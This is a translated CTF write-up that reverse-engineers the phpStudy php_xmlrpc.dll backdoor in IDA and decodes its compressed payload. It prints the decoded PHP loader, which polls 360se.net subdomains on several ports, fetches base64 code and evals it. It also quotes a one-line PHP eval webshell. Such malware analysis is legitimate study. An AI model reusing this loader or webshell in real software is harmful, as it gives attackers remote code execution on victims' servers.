brief introduction

Those who need tools and environment can add groups 809706080, If you don't know something, you can also ask questions in it , I will answer at the first time when I see

1. Find the folder on the target desktop 1 Documents in RCEBackdoor.zip, Use static decompiler IDA Analyze the program in the compressed package , Analyze the target file according to the prompts , Take the range containing the base address offset of malicious code as Flag Value submission （ Submission Form ：0x1000XXXX-0x1000XXXX）;

After entering the desktop , Unzip the file , You can see the following files

Through my friend Yuze's middleware vulnerability article and this php Version of , It can be guessed that this question was tested in previous years phpstudy Backdoor vulnerability of

Yuze's article link ：https://blog.csdn.net/liufdfd/article/details/125507247?spm=1001.2014.3001.5501

phpstudy Most of the backdoor vulnerabilities exist in ：

phpStudy20180211 edition  php5.4.45 And php5.2.17 ext Under the extended folder php_xmlrpc.dll
phpStudy20161103 edition  php5.4.45 And php5.2.17 ext Under the extended folder php_xmlrpc.dll

We open this file directory and find the backdoor file

Then drag the file into ida pro analysis

We press shift+f12 You can display the string in the file , You can find these two strange strings below

This is commonly used php Pony code

<?php @eval($_POST['cmd']);?>

Can be judged , This string is the backdoor code

Next we cross reference , Jump to the section where this code is executed , We double-click the string

Double click this place , Jump to where the code is executed

This is where the code executes , We can press f5 Take a look at the pseudo code of this segment

According to the title , Take the range containing the base address offset of malicious code as Flag Value submission ,

We do reverse analysis from the place where the malicious code is executed , In this while The loop can find

The pseudocode executed from the bottom malicious code follows my thinking

    v10 = &byte_10011B34;
    v11 = asc_1000C028;
    v41 = &byte_10011B34;
    v12 = 0;
    v13 = asc_1000C028;
    while ( 1 )
    {
      if ( *(_DWORD *)v13 == 39 )
      {
        v10[v12] = 92;
        v41[v12 + 1] = *v11;    //v41 Got v11 Memory address of variable 
        v12 += 2;
        v13 += 8;
      }
      else
      {
        v10[v12++] = *v11;
        v13 += 4;
      }
      v11 += 4;
      if ( (int)v11 >= (int)&unk_1000C66C )   // If v11 The value in the variable is greater than 1000C66C The value in the memory address 
        break;
      v10 = v41;   //v10 Variable =v41 Variable 
    }
    spprintf(&v41, 0, "@eval(%s('%s'));", aGzuncompress, v41);     // take @eval(%s('%s')); String and aGzuncompress The value in is stored in V41 variable 

I only analyzed the code in key places , Code elsewhere is not important , In the analysis, we can know , The key offset address is V11 Sum of values in if In contrast to 1000C66C The value in the memory address

Take the range containing the base address offset of malicious code as Flag Value submission

0x1000C028-0x1000C66C

2. Continue to analyze the code after anti compilation , Find out the key functions in malicious code , Use the function name used for string splicing as Flag Value submission ;（ Submission Form ：echo()）

This is much easier , We continue to ida Li analysis

You can find , The name of the concatenation string function is

spprintf

3. Continue to analyze the code after anti compilation , Find out the key functions in malicious code , Take the parameter name used to format the string as Flag Value submission ;（ Submission Form ：%*）

The malicious code is as follows

@eval(%s('%s'));

Thus we can see that , The parameter name used to format the string is

%s

4. Continue to analyze the code after anti compilation , Find out the key functions in malicious code , Use the parameter name used for string arguments as Flag Value submission ;（ Submission Form ：%*）

Through the above malicious code and learned c The language knows , The parameter name of the string parameter is

%s

5. Find the target Windows7 Folders on the desktop 1 Medium decode.py Document and improve this document , Fill in the blanks in this document F1、F2、F3、F4 Four strings , Take the contents of four strings after splicing as Flag Value submission

We turn on decode.py file

pivotal f1,f2,f3,f4 Code ：

data = zlib.F1(data)
flag = b'F2'
hwrite.write(F3)
hwrite.write(F4)
#Flag=F1.F2.F3.F4

F1 yes python Of zlib Functions in modules

F1：

decompress

F2 It's the program aGzuncompress The value in the variable

We double-click this variable to view

F2：

gzuncompress

Through this code analysis

flag = b'F2'
		offset = data.find(flag)
		data = data[offset + 0x10:offset + 0x10 + 0x567*4].replace(b"\x00\x00\x00",b"")
		decodedata_1 = zlib.F1(data[:0x191])
		print(hexdump(data[0x191:]))
		decodedata_2 = zlib.F1(data[0x191:])
		with open("compres_data1.txt","w") as hwrite:
			hwrite.write(F3)
			hwrite.close
		with open("compres_data2.txt","w") as hwrite:
			hwrite.write(F4)
			hwrite.close

F3 and F4 Respectively ：

str(decodedata_1) and str(decodedata_2)

complete flag by ：

decompress.gzuncompress.str(decodedata_1).str(decodedata_2)

6. perform decode.py Two files will be produced , Analyze and decode the contents of the second file , Arrange all port numbers in the port list from small to large as Flag value （ Such as ：21,22,23,80） Submit ;

We fill in the missing code of the program and execute

From the generated second file, we can find

@ini_set("display_errors","0");
    error_reporting(0);
    function tcpGet($sendMsg = '', $ip = '360se.net', $port = '20123'){
        $result = "";
      $handle = stream_socket_client("tcp://{$ip}:{$port}", $errno, $errstr,10);
      if( !$handle ){
        $handle = fsockopen($ip, intval($port), $errno, $errstr, 5);
        if( !$handle ){
            return "err";
        }
      }
      fwrite($handle, $sendMsg."\n");
        while(!feof($handle)){
            stream_set_timeout($handle, 2);
            $result .= fread($handle, 1024);
            $info = stream_get_meta_data($handle);
            if ($info['timed_out']) {
              break;
            }
         }
      fclose($handle);
      return $result;
    }
    $ds = array("www","bbs","cms","down","up","file","ftp");
    $ps = array("20123","40125","8080","80","53");
    $n = false;
    do {
        $n = false;
        foreach ($ds as $d){
            $b = false;
            foreach ($ps as $p){
                $result = tcpGet($i,$d.".360se.net",$p);
                if ($result != "err"){
                    $b =true;
                    break;
                }
            }
            if ($b)break;
        }
        $info = explode("<^>",$result);
        if (count($info)==4){
            if (strpos($info[3],"/*Onemore*/") !== false){
                $info[3] = str_replace("/*Onemore*/","",$info[3]);
                $n=true;
            }
            @eval(base64_decode($info[3]));
        }
    }while($n);

The order of port number from small to large is ：

53,80,8080,20123,40125

poc utilize

You can read the article written by Yuze , It is also the national secondary vocational network security B Module questions , It is called middleware penetration testing

https://blog.csdn.net/liufdfd/article/details/125507247?spm=1001.2014.3001.5502